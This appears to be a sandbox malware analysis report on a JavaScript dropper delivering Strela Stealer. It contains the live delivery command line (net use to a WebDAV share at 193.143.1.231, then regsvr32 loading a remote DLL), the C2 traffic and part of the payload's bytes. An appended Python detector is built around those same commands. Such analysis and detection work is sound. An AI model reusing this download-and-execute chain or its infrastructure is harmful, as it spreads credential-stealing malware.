                Dec 17, 2024 15:16:15.974220991 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.974328041 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.975538015 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.975599051 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.975670099 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.976783991 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.976861954 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.976950884 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.978162050 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.978224039 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.978410006 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.979456902 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.979516029 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.979675055 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.980861902 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.980922937 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.980971098 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.982085943 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.982142925 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.982280970 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.983413935 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.983469963 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.983556986 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.984761953 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.984822989 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.984916925 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.986130953 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.986188889 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.986244917 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.987442970 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.987504005 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.987652063 CET888849709193.143.1.231192.168.2.5
Timestamp                            Source Port  Dest Port  Source IP       Dest IP
Dec 17, 2024 15:16:15.989025116 CET  8888         49709      193.143.1.231   192.168.2.5
Dec 17, 2024 15:16:15.989083052 CET  49709        8888       192.168.2.5     193.143.1.231
Dec 17, 2024 15:16:15.989136934 CET  8888         49709      193.143.1.231   192.168.2.5
Dec 17, 2024 15:16:15.990140915 CET  8888         49709      193.143.1.231   192.168.2.5
Dec 17, 2024 15:16:15.990200996 CET  49709        8888       192.168.2.5     193.143.1.231
Dec 17, 2024 15:16:15.990287066 CET  8888         49709      193.143.1.231   192.168.2.5
Dec 17, 2024 15:16:15.991391897 CET  8888         49709      193.143.1.231   192.168.2.5
Dec 17, 2024 15:16:15.991451025 CET  49709        8888       192.168.2.5     193.143.1.231
Dec 17, 2024 15:16:15.991506100 CET  8888         49709      193.143.1.231   192.168.2.5
Dec 17, 2024 15:16:15.992685080 CET  8888         49709      193.143.1.231   192.168.2.5
Dec 17, 2024 15:16:15.992748022 CET  49709        8888       192.168.2.5     193.143.1.231
Dec 17, 2024 15:16:15.992914915 CET  8888         49709      193.143.1.231   192.168.2.5
Dec 17, 2024 15:16:15.994009018 CET  8888         49709      193.143.1.231   192.168.2.5
Dec 17, 2024 15:16:15.994075060 CET  49709        8888       192.168.2.5     193.143.1.231
Dec 17, 2024 15:16:15.994138956 CET  8888         49709      193.143.1.231   192.168.2.5
Dec 17, 2024 15:16:15.995341063 CET  8888         49709      193.143.1.231   192.168.2.5
Dec 17, 2024 15:16:15.995400906 CET  49709        8888       192.168.2.5     193.143.1.231
Dec 17, 2024 15:16:15.995496035 CET  8888         49709      193.143.1.231   192.168.2.5
Dec 17, 2024 15:16:15.996687889 CET  8888         49709      193.143.1.231   192.168.2.5
Dec 17, 2024 15:16:15.996752977 CET  49709        8888       192.168.2.5     193.143.1.231
Dec 17, 2024 15:16:15.996849060 CET  8888         49709      193.143.1.231   192.168.2.5
Dec 17, 2024 15:16:15.998014927 CET  8888         49709      193.143.1.231   192.168.2.5
Dec 17, 2024 15:16:15.998075962 CET  49709        8888       192.168.2.5     193.143.1.231
Dec 17, 2024 15:16:15.998202085 CET  8888         49709      193.143.1.231   192.168.2.5
Dec 17, 2024 15:16:16.042490959 CET  49709        8888       192.168.2.5     193.143.1.231
Dec 17, 2024 15:16:44.672780991 CET  8888         49705      193.143.1.231   192.168.2.5
Dec 17, 2024 15:16:44.672887087 CET  49705        8888       192.168.2.5     193.143.1.231
Dec 17, 2024 15:16:44.672986031 CET  49705        8888       192.168.2.5     193.143.1.231
Dec 17, 2024 15:16:44.792531013 CET  8888         49705      193.143.1.231   192.168.2.5
Dec 17, 2024 15:16:45.965971947 CET  8888         49706      193.143.1.231   192.168.2.5
Dec 17, 2024 15:16:45.966187000 CET  49706        8888       192.168.2.5     193.143.1.231
Dec 17, 2024 15:16:45.966187000 CET  49706        8888       192.168.2.5     193.143.1.231
Dec 17, 2024 15:16:46.086020947 CET  8888         49706      193.143.1.231   192.168.2.5
Dec 17, 2024 15:16:47.756829977 CET  8888         49707      193.143.1.231   192.168.2.5
Dec 17, 2024 15:16:47.757021904 CET  49707        8888       192.168.2.5     193.143.1.231
Dec 17, 2024 15:16:47.757021904 CET  49707        8888       192.168.2.5     193.143.1.231
Dec 17, 2024 15:16:47.876621008 CET  8888         49707      193.143.1.231   192.168.2.5
Dec 17, 2024 15:16:47.964276075 CET  8888         49708      193.143.1.231   192.168.2.5
Dec 17, 2024 15:16:47.964345932 CET  49708        8888       192.168.2.5     193.143.1.231
Dec 17, 2024 15:16:47.964579105 CET  49708        8888       192.168.2.5     193.143.1.231
Dec 17, 2024 15:16:48.084042072 CET  8888         49708      193.143.1.231   192.168.2.5
Dec 17, 2024 15:16:52.919713020 CET  8888         49709      193.143.1.231   192.168.2.5
Dec 17, 2024 15:16:52.919805050 CET  49709        8888       192.168.2.5     193.143.1.231
Dec 17, 2024 15:16:52.919895887 CET  49709        8888       192.168.2.5     193.143.1.231
Dec 17, 2024 15:16:53.039525032 CET  8888         49709      193.143.1.231   192.168.2.5
                • 193.143.1.231:8888
Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
0           192.168.2.5  49704        193.143.1.231   8888              3944  C:\Windows\System32\net.exe

Timestamp                            Bytes transferred  Direction  Data
Dec 17, 2024 15:16:02.329371929 CET  107                OUT        OPTIONS / HTTP/1.1
                Connection: Keep-Alive
                User-Agent: DavClnt
                translate: f
                Host: 193.143.1.231:8888
Dec 17, 2024 15:16:03.748127937 CET  223                IN         HTTP/1.1 200 OK
                Server: nginx/1.22.1
                Date: Tue, 17 Dec 2024 14:16:03 GMT
                Content-Length: 0
                Connection: keep-alive
                Allow: OPTIONS, LOCK, DELETE, PROPPATCH, COPY, MOVE, UNLOCK, PROPFIND
                Dav: 1, 2
                Ms-Author-Via: DAV


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID  Process
1           192.168.2.5  49705        193.143.1.231   8888

Timestamp                            Bytes transferred  Direction  Data
Dec 17, 2024 15:16:07.084291935 CET  137                OUT        OPTIONS / HTTP/1.1
                Connection: Keep-Alive
                User-Agent: Microsoft-WebDAV-MiniRedir/10.0.19045
                translate: f
                Host: 193.143.1.231:8888
Dec 17, 2024 15:16:08.539954901 CET  223                IN         HTTP/1.1 200 OK
                Server: nginx/1.22.1
                Date: Tue, 17 Dec 2024 14:16:08 GMT
                Content-Length: 0
                Connection: keep-alive
                Allow: OPTIONS, LOCK, DELETE, PROPPATCH, COPY, MOVE, UNLOCK, PROPFIND
                Dav: 1, 2
                Ms-Author-Via: DAV


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID  Process
2           192.168.2.5  49706        193.143.1.231   8888

Timestamp                            Bytes transferred  Direction  Data
Dec 17, 2024 15:16:10.208786011 CET  692                IN         HTTP/1.1 207 Multi-Status
                Server: nginx/1.22.1
                Date: Tue, 17 Dec 2024 14:16:09 GMT
                Content-Type: text/xml; charset=utf-8
                Content-Length: 520
                Connection: keep-alive
                Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 44 3a 6d 75 6c 74 69 73 74 61 74 75 73 20 78 6d 6c 6e 73 3a 44 3d 22 44 41 56 3a 22 3e 3c 44 3a 72 65 73 70 6f 6e 73 65 3e 3c 44 3a 68 72 65 66 3e 2f 3c 2f 44 3a 68 72 65 66 3e 3c 44 3a 70 72 6f 70 73 74 61 74 3e 3c 44 3a 70 72 6f 70 3e 3c 44 3a 73 75 70 70 6f 72 74 65 64 6c 6f 63 6b 3e 3c 44 3a 6c 6f 63 6b 65 6e 74 72 79 20 78 6d 6c 6e 73 3a 44 3d 22 44 41 56 3a 22 3e 3c 44 3a 6c 6f 63 6b 73 63 6f 70 65 3e 3c 44 3a 65 78 63 6c 75 73 69 76 65 2f 3e 3c 2f 44 3a 6c 6f 63 6b 73 63 6f 70 65 3e 3c 44 3a 6c 6f 63 6b 74 79 70 65 3e 3c 44 3a 77 72 69 74 65 2f 3e 3c 2f 44 3a 6c 6f 63 6b 74 79 70 65 3e 3c 2f 44 3a 6c 6f 63 6b 65 6e 74 72 79 3e 3c 2f 44 3a 73 75 70 70 6f 72 74 65 64 6c 6f 63 6b 3e 3c 44 3a 72 65 73 6f 75 72 63 65 74 79 70 65 3e 3c 44 3a 63 6f 6c 6c 65 63 74 69 6f 6e 20 78 6d 6c 6e 73 3a 44 3d 22 44 41 56 3a 22 2f 3e 3c 2f 44 3a 72 65 73 6f 75 72 63 65 74 79 70 65 3e 3c 44 3a 67 [TRUNCATED]
                Data Ascii: <?xml version="1.0" encoding="UTF-8"?><D:multistatus xmlns:D="DAV:"><D:response><D:href>/</D:href><D:propstat><D:prop><D:supportedlock><D:lockentry xmlns:D="DAV:"><D:lockscope><D:exclusive/></D:lockscope><D:locktype><D:write/></D:locktype></D:lockentry></D:supportedlock><D:resourcetype><D:collection xmlns:D="DAV:"/></D:resourcetype><D:getlastmodified>Mon, 16 Dec 2024 12:13:21 GMT</D:getlastmodified><D:displayname></D:displayname></D:prop><D:status>HTTP/1.1 200 OK</D:status></D:propstat></D:response></D:multistatus>


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID  Process
3           192.168.2.5  49707        193.143.1.231   8888

Timestamp                            Bytes transferred  Direction  Data
Dec 17, 2024 15:16:11.761334896 CET  692                IN         HTTP/1.1 207 Multi-Status
                Server: nginx/1.22.1
                Date: Tue, 17 Dec 2024 14:16:11 GMT
                Content-Type: text/xml; charset=utf-8
                Content-Length: 520
                Connection: keep-alive
                Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 44 3a 6d 75 6c 74 69 73 74 61 74 75 73 20 78 6d 6c 6e 73 3a 44 3d 22 44 41 56 3a 22 3e 3c 44 3a 72 65 73 70 6f 6e 73 65 3e 3c 44 3a 68 72 65 66 3e 2f 3c 2f 44 3a 68 72 65 66 3e 3c 44 3a 70 72 6f 70 73 74 61 74 3e 3c 44 3a 70 72 6f 70 3e 3c 44 3a 64 69 73 70 6c 61 79 6e 61 6d 65 3e 3c 2f 44 3a 64 69 73 70 6c 61 79 6e 61 6d 65 3e 3c 44 3a 73 75 70 70 6f 72 74 65 64 6c 6f 63 6b 3e 3c 44 3a 6c 6f 63 6b 65 6e 74 72 79 20 78 6d 6c 6e 73 3a 44 3d 22 44 41 56 3a 22 3e 3c 44 3a 6c 6f 63 6b 73 63 6f 70 65 3e 3c 44 3a 65 78 63 6c 75 73 69 76 65 2f 3e 3c 2f 44 3a 6c 6f 63 6b 73 63 6f 70 65 3e 3c 44 3a 6c 6f 63 6b 74 79 70 65 3e 3c 44 3a 77 72 69 74 65 2f 3e 3c 2f 44 3a 6c 6f 63 6b 74 79 70 65 3e 3c 2f 44 3a 6c 6f 63 6b 65 6e 74 72 79 3e 3c 2f 44 3a 73 75 70 70 6f 72 74 65 64 6c 6f 63 6b 3e 3c 44 3a 72 65 73 6f 75 72 63 65 74 79 70 65 3e 3c 44 3a 63 6f 6c 6c 65 63 74 69 6f 6e 20 78 6d 6c 6e 73 3a [TRUNCATED]
                Data Ascii: <?xml version="1.0" encoding="UTF-8"?><D:multistatus xmlns:D="DAV:"><D:response><D:href>/</D:href><D:propstat><D:prop><D:displayname></D:displayname><D:supportedlock><D:lockentry xmlns:D="DAV:"><D:lockscope><D:exclusive/></D:lockscope><D:locktype><D:write/></D:locktype></D:lockentry></D:supportedlock><D:resourcetype><D:collection xmlns:D="DAV:"/></D:resourcetype><D:getlastmodified>Mon, 16 Dec 2024 12:13:21 GMT</D:getlastmodified></D:prop><D:status>HTTP/1.1 200 OK</D:status></D:propstat></D:response></D:multistatus>


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID  Process
4           192.168.2.5  49708        193.143.1.231   8888

Timestamp                            Bytes transferred  Direction  Data
Dec 17, 2024 15:16:13.427613974 CET  854                IN         HTTP/1.1 207 Multi-Status
                Server: nginx/1.22.1
                Date: Tue, 17 Dec 2024 14:16:13 GMT
                Content-Type: text/xml; charset=utf-8
                Content-Length: 682
                Connection: keep-alive
                Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 44 3a 6d 75 6c 74 69 73 74 61 74 75 73 20 78 6d 6c 6e 73 3a 44 3d 22 44 41 56 3a 22 3e 3c 44 3a 72 65 73 70 6f 6e 73 65 3e 3c 44 3a 68 72 65 66 3e 2f 31 34 30 33 34 31 36 32 35 36 32 33 38 36 33 2e 64 6c 6c 3c 2f 44 3a 68 72 65 66 3e 3c 44 3a 70 72 6f 70 73 74 61 74 3e 3c 44 3a 70 72 6f 70 3e 3c 44 3a 73 75 70 70 6f 72 74 65 64 6c 6f 63 6b 3e 3c 44 3a 6c 6f 63 6b 65 6e 74 72 79 20 78 6d 6c 6e 73 3a 44 3d 22 44 41 56 3a 22 3e 3c 44 3a 6c 6f 63 6b 73 63 6f 70 65 3e 3c 44 3a 65 78 63 6c 75 73 69 76 65 2f 3e 3c 2f 44 3a 6c 6f 63 6b 73 63 6f 70 65 3e 3c 44 3a 6c 6f 63 6b 74 79 70 65 3e 3c 44 3a 77 72 69 74 65 2f 3e 3c 2f 44 3a 6c 6f 63 6b 74 79 70 65 3e 3c 2f 44 3a 6c 6f 63 6b 65 6e 74 72 79 3e 3c 2f 44 3a 73 75 70 70 6f 72 74 65 64 6c 6f 63 6b 3e 3c 44 3a 72 65 73 6f 75 72 63 65 74 79 70 65 3e 3c 2f 44 3a 72 65 73 6f 75 72 63 65 74 79 70 65 3e 3c 44 3a 67 65 74 63 6f 6e 74 65 6e 74 6c 65 [TRUNCATED]
                Data Ascii: <?xml version="1.0" encoding="UTF-8"?><D:multistatus xmlns:D="DAV:"><D:response><D:href>/140341625623863.dll</D:href><D:propstat><D:prop><D:supportedlock><D:lockentry xmlns:D="DAV:"><D:lockscope><D:exclusive/></D:lockscope><D:locktype><D:write/></D:locktype></D:lockentry></D:supportedlock><D:resourcetype></D:resourcetype><D:getcontentlength>418816</D:getcontentlength><D:getlastmodified>Tue, 17 Dec 2024 14:13:22 GMT</D:getlastmodified><D:getetag>"1811fc5bc5a4e37266400"</D:getetag><D:displayname>140341625623863.dll</D:displayname><D:getcontenttype>application/octet-stream</D:getcontenttype></D:prop><D:status>HTTP/1.1 200 OK</D:status></D:propstat></D:response></D:multistatus>


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID  Process
5           192.168.2.5  49709        193.143.1.231   8888

Timestamp                            Bytes transferred  Direction  Data
Dec 17, 2024 15:16:13.555913925 CET  195                OUT        GET /140341625623863.dll HTTP/1.1
                Cache-Control: no-cache
                Connection: Keep-Alive
                Pragma: no-cache
                User-Agent: Microsoft-WebDAV-MiniRedir/10.0.19045
                translate: f
                Host: 193.143.1.231:8888
Dec 17, 2024 15:16:14.979101896 CET  1236               IN         HTTP/1.1 200 OK
                Server: nginx/1.22.1
                Date: Tue, 17 Dec 2024 14:16:14 GMT
                Content-Type: application/octet-stream
                Content-Length: 418816
                Connection: keep-alive
                Accept-Ranges: bytes
                Etag: "1811fc5bc5a4e37266400"
                Last-Modified: Tue, 17 Dec 2024 14:13:22 GMT
                Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 64 86 04 00 19 51 61 67 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 0e 00 00 d2 00 00 00 8e 05 00 00 00 00 00 f0 12 00 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 06 00 00 04 00 00 00 00 00 00 02 00 60 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 f0 00 00 57 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 06 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEdQag" `W.text `.rdatax@@.data@.pdatab@@



                Target ID:0
                Start time:09:16:00
                Start date:17/12/2024
                Path:C:\Windows\System32\wscript.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\126484723232027823.js"
                Imagebase:0x7ff745dd0000
                File size:170'496 bytes
                MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Target ID:2
                Start time:09:16:00
                Start date:17/12/2024
                Path:C:\Windows\System32\cmd.exe
                Wow64 process (32bit):false
                Commandline:"C:\Windows\System32\cmd.exe" /c cmd /c net use \\193.143.1.231@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.231@8888\davwwwroot\140341625623863.dll
                Imagebase:0x7ff63b820000
                File size:289'792 bytes
                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Target ID:3
                Start time:09:16:00
                Start date:17/12/2024
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase:0x7ff6d64d0000
                File size:862'208 bytes
                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Target ID:4
                Start time:09:16:00
                Start date:17/12/2024
                Path:C:\Windows\System32\cmd.exe
                Wow64 process (32bit):false
                Commandline:cmd /c net use \\193.143.1.231@8888\davwwwroot\
                Imagebase:0x7ff63b820000
                File size:289'792 bytes
                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Target ID:5
                Start time:09:16:00
                Start date:17/12/2024
                Path:C:\Windows\System32\net.exe
                Wow64 process (32bit):false
                Commandline:net use \\193.143.1.231@8888\davwwwroot\
                Imagebase:0x7ff636720000
                File size:59'904 bytes
                MD5 hash:0BD94A338EEA5A4E1F2830AE326E6D19
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Target ID:10
                Start time:09:16:10
                Start date:17/12/2024
                Path:C:\Windows\System32\cmd.exe
                Wow64 process (32bit):false
                Commandline:cmd /c regsvr32 /s \\193.143.1.231@8888\davwwwroot\140341625623863.dll
                Imagebase:0x7ff63b820000
                File size:289'792 bytes
                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Target ID:11
                Start time:09:16:10
                Start date:17/12/2024
                Path:C:\Windows\System32\regsvr32.exe
                Wow64 process (32bit):false
                Commandline:regsvr32 /s \\193.143.1.231@8888\davwwwroot\140341625623863.dll
                Imagebase:0x7ff7e6400000
                File size:25'088 bytes
                MD5 hash:B0C2FA35D14A9FAD919E99D9D75E1B9E
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_StrelaStealer, Description: Yara detected Strela Stealer, Source: 0000000B.00000002.2209329233.0000000002201000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_StrelaStealer, Description: Yara detected Strela Stealer, Source: 0000000B.00000002.2209539224.00007FF8B7E10000.00000004.00000001.01000000.00000007.sdmp, Author: Joe Security
                Reputation:high
                Has exited:true
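
The process list and HTTP sessions above show the complete delivery chain: net use mounts \\193.143.1.231@8888\davwwwroot\ through the WebDAV Mini-Redirector (User-Agent Microsoft-WebDAV-MiniRedir/10.0.19045 on port 8888), the client gets PROPFIND 207 Multi-Status answers listing /140341625623863.dll (418816 bytes), fetches it with a GET, and regsvr32 /s loads it straight off the share. The following Python is an added example, not part of the Joe Sandbox report: it implements the host-side checks (WebDAV UNC with an @port suffix, the DavWWWRoot alias, net use, regsvr32 against a remote DLL) and network-side checks (a WebDAV client UA on a non-standard port, a DLL fetched over WebDAV) a detection engineer would write for this pattern, and parses the 207 Multi-Status body to recover the staged file's name, size and ETag. The process records, the GET request and a trimmed copy of the PROPFIND response are copied from this report; the record shapes and function names are my own assumptions.

```python
"""Host- and network-side checks for the WebDAV/regsvr32 delivery chain (added example)."""
import re
import xml.etree.ElementTree as ET

# UNC form that Windows routes through the WebDAV Mini-Redirector: \\host@port\share\...
# "@SSL" selects HTTPS (port 443 unless "@SSL@port" gives another one).
WEBDAV_UNC = re.compile(
    r"\\\\(?P<host>[A-Za-z0-9.\-]+)@(?P<port>\d+|SSL)(?:@(?P<port2>\d+))?"
    r"\\(?P<share>[^\\\s]+)",
    re.IGNORECASE,
)
DAV_USER_AGENTS = ("Microsoft-WebDAV-MiniRedir/", "DavClnt")  # both UAs seen in this report
DAV = "{DAV:}"  # WebDAV XML namespace used in Multi-Status bodies


def parse_webdav_unc(cmdline):
    """Return (host, port, share) for the first WebDAV-style UNC in cmdline, else None."""
    m = WEBDAV_UNC.search(cmdline)
    if not m:
        return None
    port = m.group("port2") or m.group("port")
    return m.group("host"), (443 if port.upper() == "SSL" else int(port)), m.group("share")


def check_process(image, cmdline):
    """Reasons to flag one process record (image path + command line); [] if clean."""
    reasons = []
    unc = parse_webdav_unc(cmdline)
    if unc is None:
        return reasons
    host, port, share = unc
    if port not in (80, 443):
        reasons.append(f"WebDAV UNC to {host} on non-standard port {port}")
    if share.lower() == "davwwwroot":
        reasons.append("DavWWWRoot share alias forces the WebDAV redirector")
    if re.search(r"\bnet(?:1)?(?:\.exe)?\s+use\b", cmdline, re.I):
        reasons.append("net use mounting a remote WebDAV share")
    if re.search(r"\bregsvr32(?:\.exe)?\b", cmdline, re.I) and re.search(r"\.dll\b", cmdline, re.I):
        reasons.append("regsvr32 registering a DLL straight from the WebDAV share")
    return reasons


def check_http(dst_port, request_line, headers):
    """Reasons to flag one HTTP request (destination port, request line, header dict)."""
    reasons = []
    ua = headers.get("User-Agent", "")
    if ua.startswith(DAV_USER_AGENTS) and dst_port not in (80, 443):
        reasons.append(f"WebDAV client UA '{ua}' to non-standard port {dst_port}")
    method, _, rest = request_line.partition(" ")
    target = rest.split(" ")[0]
    if method.upper() == "GET" and target.lower().endswith(".dll"):
        reasons.append(f"DLL fetched over WebDAV: {target}")
    return reasons


def parse_propfind(body):
    """Parse a 207 Multi-Status body into [{href, collection, length, etag}, ...]."""
    root = ET.fromstring(body.encode("utf-8") if isinstance(body, str) else body)
    entries = []
    for resp in root.iter(DAV + "response"):
        prop = resp.find(f"{DAV}propstat/{DAV}prop")
        is_dir = prop is not None and prop.find(f"{DAV}resourcetype/{DAV}collection") is not None
        length = prop.findtext(DAV + "getcontentlength") if prop is not None else None
        entries.append({
            "href": resp.findtext(DAV + "href"),
            "collection": is_dir,
            "length": int(length) if length else None,
            "etag": prop.findtext(DAV + "getetag") if prop is not None else None,
        })
    return entries


# Sample inputs copied from this report (process list and HTTP session 5); the
# PROPFIND body is a trimmed copy of session 4's response.
PROCESSES = [
    ("C:\\Windows\\System32\\cmd.exe",
     "\"C:\\Windows\\System32\\cmd.exe\" /c cmd /c net use \\\\193.143.1.231@8888\\davwwwroot\\"
     "&&cmd /c regsvr32 /s \\\\193.143.1.231@8888\\davwwwroot\\140341625623863.dll"),
    ("C:\\Windows\\System32\\net.exe", "net use \\\\193.143.1.231@8888\\davwwwroot\\"),
    ("C:\\Windows\\System32\\regsvr32.exe",
     "regsvr32 /s \\\\193.143.1.231@8888\\davwwwroot\\140341625623863.dll"),
]
GET_REQUEST = (8888, "GET /140341625623863.dll HTTP/1.1", {
    "Cache-Control": "no-cache", "Connection": "Keep-Alive", "Pragma": "no-cache",
    "User-Agent": "Microsoft-WebDAV-MiniRedir/10.0.19045", "translate": "f",
    "Host": "193.143.1.231:8888"})
PROPFIND_DLL = ('<?xml version="1.0" encoding="UTF-8"?><D:multistatus xmlns:D="DAV:">'
    '<D:response><D:href>/140341625623863.dll</D:href><D:propstat><D:prop>'
    '<D:resourcetype></D:resourcetype><D:getcontentlength>418816</D:getcontentlength>'
    '<D:getetag>"1811fc5bc5a4e37266400"</D:getetag>'
    '<D:displayname>140341625623863.dll</D:displayname></D:prop>'
    '<D:status>HTTP/1.1 200 OK</D:status></D:propstat></D:response></D:multistatus>')


def run_report():
    """Apply every check to the sample records; returns {source: [reasons]}."""
    findings = {}
    for image, cmdline in PROCESSES:
        reasons = check_process(image, cmdline)
        if reasons:
            findings[image.rsplit("\\", 1)[-1]] = reasons
    port, line, hdrs = GET_REQUEST
    findings["http"] = check_http(port, line, hdrs)
    findings["propfind"] = [f"{e['href']} ({e['length']} bytes, etag {e['etag']})"
                            for e in parse_propfind(PROPFIND_DLL) if not e["collection"]]
    return findings


if __name__ == "__main__":
    for source, reasons in run_report().items():
        for why in reasons:
            print(f"{source}: {why}")
```

The UNC regex is the useful generalisation: it also catches the @SSL and @SSL@port forms, so the same rule covers HTTPS WebDAV staging, and the port check is what separates this traffic from legitimate SharePoint or OneDrive WebDAV on 443. In production the PROPFIND parser is mainly useful for the proxy log side: the href and getcontentlength it returns match the Content-Length of the later GET, which lets a network analyst tie the listing to the download without a full-packet capture.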


                  Execution Graph

                  Execution Coverage:2.4%
                  Dynamic/Decrypted Code Coverage:100%
                  Signature Coverage:6.2%
                  Total number of Nodes:848
                  Total number of Limit Nodes:4
[Execution graph: rendered as an interactive node/edge diagram in the original report; the serialized node and edge data is not reproducible as text. What survives of it: the nodes are code addresses in the 0x223c0f0-0x224ab5c range of the regsvr32.exe process (the same 0x22xxxxx region as the first Yara-matched memory dump listed under Target ID 11), the resolved symbols are MSVC CRT and C++ exception-handling routines (__CxxCallCatchBlock, __GSHandlerCheck_EH, __FrameHandler3::FrameUnwindToEmptyState, __FrameHandler3::GetHandlerSearchState, __except_validate_context_record, Is_bad_exception_allowed, _invalid_parameter_noinfo, __free_lconv_mon, _set_fmode, _RTC_Initialize, _log10_special, __scrt_get_show_window_mode, Concurrency::details::SchedulerProxy::DeleteThis), and the only named Win32 API in the visible part of the graph is ExitProcess.]
